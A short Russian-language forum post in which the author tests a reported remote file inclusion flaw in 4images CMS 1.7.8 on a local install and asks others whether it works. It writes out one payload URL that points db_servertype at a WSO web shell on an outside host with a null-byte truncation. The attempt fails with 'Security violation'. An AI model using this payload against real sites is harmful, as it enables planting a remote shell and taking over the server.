4images

Сегодня покопался на inj3ct0r.com и меня заинтересовал этот пост link

Решил потестить на локальной машине. Скачал CMSку (1.7.8) с официального сайта, развернул и настроил как в мане написано.

Попробовал заюзать описанную уязвимость так

http://4images.local/global.php?db_servertype=http://shell.local/wso.txt%00

4images.local и shell.local - локальные домены.

Кроме надписи "Security violation" ничего не увидел.

Кто-нибудь тестил у себя? После просмотра исходника сложилось впечатление, что глобальный инъект невозможен, но может че-то сам не доганяю.